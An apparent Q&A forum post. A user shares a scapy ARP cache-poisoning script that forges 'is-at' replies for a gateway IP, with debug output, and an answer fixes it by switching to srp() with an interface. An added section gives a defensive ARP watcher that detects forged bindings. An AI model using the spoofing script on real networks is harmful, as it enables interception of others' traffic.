I'm trying to use scapy to send a forged arp is-at to direct traffic to my computer (legally of course, this is my network), however scapy prints a warning saying that the mac address isn't found, so it defaults to broadcast.
Also as a side note is there any way to autodetect the mac address of the machine you run this program from?
from scapy.all import *
"""The general idea of this script is to receive an arp packet, send back a forged one, claiming to be the ip address we are poisoning but with a different mac
however im no networking genius nor a legitimate hacker"""
arpkt = Ether()/ARP()
#UI
dst = input("Select ip address to poison: ")
#Ethernet settings
arpkt[Ether].src = "" #you would enter your mac here
arpkt[Ether].type = 2054
#ARP settings
arpkt[ARP].hwtype = 1
arpkt[ARP].ptype = 2048
arpkt[ARP].hwlen = 6
arpkt[ARP].plen = 4
arpkt[ARP].op = 2
arpkt[ARP].hwsrc = "" #you would enter your mac here
arpkt[ARP].psrc = dst
#starting sniff
pkts = sniff(count=1, filter="arp")
#sniff loop
while pkts[0].pdst != dst and pkts[0].op == 1:
    pkts = sniff(count=1, filter="arp")
    print("arp from " + pkts[0].psrc)
#send/receive packets
if pkts[0].pdst == dst:
    arpkt[Ether].dst = pkts[0].src
    arpkt[ARP].pdst = pkts[0].psrc
    arpkt[ARP].hwdst = pkts[0].hwsrc
    #for debugging
    pkts[0].show()
    arpkt.show()
    #send and receive packets
    rpkt = sr(arpkt)
    #more debug
    arpkt.show()
    for x in rpkt:
        x.show()
        input("Press enter to continue...")
Thank you.
Also, here is the output,
Select ip address to poison: 10.0.4.1
arp from 10.0.4.14
arp from 10.0.4.14
arp from 10.0.4.14
arp from 10.0.4.14
arp from 10.0.4.14
arp from 10.0.4.14
arp from 10.0.4.63
arp from 10.0.4.43
arp from 10.0.4.14
arp from 10.0.4.14
arp from 10.0.4.14
arp from 10.0.4.14
arp from 10.0.4.14
arp from 10.0.4.14
arp from 10.0.4.14
arp from 10.0.4.14
arp from 10.0.4.14
arp from 10.0.4.14
arp from 10.0.4.63
arp from 10.0.4.14
arp from 10.0.4.14
arp from 10.0.4.11
arp from 10.0.4.43
arp from 10.0.4.14
arp from 10.0.4.14
arp from 10.0.4.14
arp from 10.0.4.36
###[ Ethernet ]###
dst = ff:ff:ff:ff:ff:ff
src = 74:ab:93:00:1d:10
type = ARP
###[ ARP ]###
hwtype = Ethernet (10Mb)
ptype = IPv4
hwlen = 6
plen = 4
op = who-has
hwsrc = 74:ab:93:00:1d:10
psrc = 10.0.4.36
hwdst = 00:00:00:00:00:00
pdst = 10.0.4.1
###[ Padding ]###
load = '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
###[ Ethernet ]###
dst = 74:ab:93:00:1d:10
src = 50:EB:F6:7E:FF:55
type = ARP
###[ ARP ]###
hwtype = Ethernet (10Mb)
ptype = IPv4
hwlen = 6
plen = 4
op = is-at
hwsrc = 50:EB:F6:7E:FF:55
psrc = 10.0.4.1
hwdst = 74:ab:93:00:1d:10
pdst = 10.0.4.36
Begin emission:
WARNING: Mac address to reach destination not found. Using broadcast.
Finished sending 1 packets.
...........................................................................................................................
Received 123 packets, got 0 answers, remaining 1 packets
###[ Ethernet ]###
dst = 74:ab:93:00:1d:10
src = 50:EB:F6:7E:FF:55
type = ARP
###[ ARP ]###
hwtype = Ethernet (10Mb)
ptype = IPv4
hwlen = 6
plen = 4
op = is-at
hwsrc = 50:EB:F6:7E:FF:55
psrc = 10.0.4.1
hwdst = 74:ab:93:00:1d:10
pdst = 10.0.4.36
Press enter to continue...
0000 Ether / ARP is at 50:EB:F6:7E:FF:55 says 10.0.4.1
Press enter to continue...
It displays all of the IPs that send an ARP, and also displays the captured packet and sent packet (for debugging).
As you can see, it also displays WARNING: Mac address to reach destination not found. Using broadcast.
sr is for L3 packets (IP+).
You are sending a L2 packet (Ethernet), so you need to use srp(arpkt) instead of sr(arpkt).
On layer 2, remember that you might need to specify the interface using iface= in srp.
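A defender's view of the same exchange, as an added example that is not part of the original question or answer: a watcher that parses raw ARP frames and flags a sender that contradicts a pinned IP-to-MAC binding. The frames are constructed from the addresses in the output above; `parse_arp`, `ArpWatch`, `make_frame` and `GATEWAY_MAC` are hypothetical names, and the gateway MAC is an assumed value because the page never shows it.

```python
import socket
import struct

ARP_FMT = "!6s6sH" "HHBBH" "6s4s6s4s"   # Ethernet header + ARP body for Ethernet/IPv4

def fmt_mac(raw):
    return ":".join(f"{b:02x}" for b in raw)

def parse_arp(frame):
    """Decode an Ethernet/IPv4 ARP frame; return None for anything else."""
    size = struct.calcsize(ARP_FMT)               # 42 bytes; trailing padding is ignored
    if len(frame) < size:
        return None
    (_, eth_src, etype, hwtype, ptype, hwlen, plen, op,
     hwsrc, psrc, _, _) = struct.unpack(ARP_FMT, frame[:size])
    if (etype, hwtype, ptype, hwlen, plen) != (0x0806, 1, 0x0800, 6, 4):
        return None
    return {"op": op, "eth_src": fmt_mac(eth_src), "hwsrc": fmt_mac(hwsrc),
            "psrc": socket.inet_ntoa(psrc)}

class ArpWatch:
    """Track IP-to-MAC bindings and report frames that contradict them."""
    def __init__(self, pinned=None):
        self.bindings = dict(pinned or {})        # ip -> mac, e.g. the real gateway

    def observe(self, frame):
        pkt = parse_arp(frame)
        if pkt is None or pkt["psrc"] == "0.0.0.0":   # not ARP, or an address probe
            return []
        alerts = []
        if pkt["eth_src"] != pkt["hwsrc"]:
            alerts.append(f"sender mismatch: frame from {pkt['eth_src']}, ARP says {pkt['hwsrc']}")
        known = self.bindings.setdefault(pkt["psrc"], pkt["hwsrc"])
        if known != pkt["hwsrc"]:
            alerts.append(f"binding conflict: {pkt['psrc']} is {known}, now claimed by {pkt['hwsrc']}")
        return alerts

def make_frame(eth_dst, eth_src, op, hwsrc, psrc, hwdst, pdst):
    """Build sample frame bytes for the demo below (nothing is sent)."""
    m = lambda s: bytes.fromhex(s.replace(":", ""))
    return struct.pack(ARP_FMT, m(eth_dst), m(eth_src), 0x0806, 1, 0x0800, 6, 4, op,
                       m(hwsrc), socket.inet_aton(psrc), m(hwdst), socket.inet_aton(pdst))

# Constructed sample traffic using the addresses from the output above.
GATEWAY_MAC = "02:00:00:00:04:01"   # assumption: the page never shows the real MAC of 10.0.4.1
REQUEST = make_frame("ff:ff:ff:ff:ff:ff", "74:ab:93:00:1d:10", 1, "74:ab:93:00:1d:10",
                     "10.0.4.36", "00:00:00:00:00:00", "10.0.4.1") + bytes(18)
FORGED = make_frame("74:ab:93:00:1d:10", "50:eb:f6:7e:ff:55", 2, "50:eb:f6:7e:ff:55",
                    "10.0.4.1", "74:ab:93:00:1d:10", "10.0.4.36")

if __name__ == "__main__":
    watch = ArpWatch(pinned={"10.0.4.1": GATEWAY_MAC})
    for frame in (REQUEST, FORGED):
        print(watch.observe(frame))
```

Without a pinned entry the watcher learns the first binding it sees, so it only catches a later change of MAC for that IP.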